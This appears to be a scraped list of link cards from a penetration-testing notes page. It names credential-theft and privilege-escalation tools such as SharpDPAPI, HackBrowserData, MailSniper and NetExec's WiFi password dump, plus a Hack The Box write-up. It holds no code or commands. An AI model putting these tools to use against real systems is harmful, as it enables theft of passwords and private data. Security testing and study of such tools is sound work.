GitHub - GhostPack/SharpDPAPI: SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.GitHub
Logo
GitHub - 0xSs0rZ/Windows_PrivEsc_Tools_precompiledGitHub
GitHub - moonD4rk/HackBrowserData: Extract and decrypt browser data, supporting multiple data types, runnable on various operating systems (macOS, Windows, Linux).GitHub
Logo
Logo
HTB: Jeeves0xdf hacks stuff
Logo
Logo
GitHub - dafthack/MailSniper: MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.GitHub
Dump WIFI password | NetExec
Logo
Logo
Logo
Logo
Logo
Logo
Logo
Logo
Logo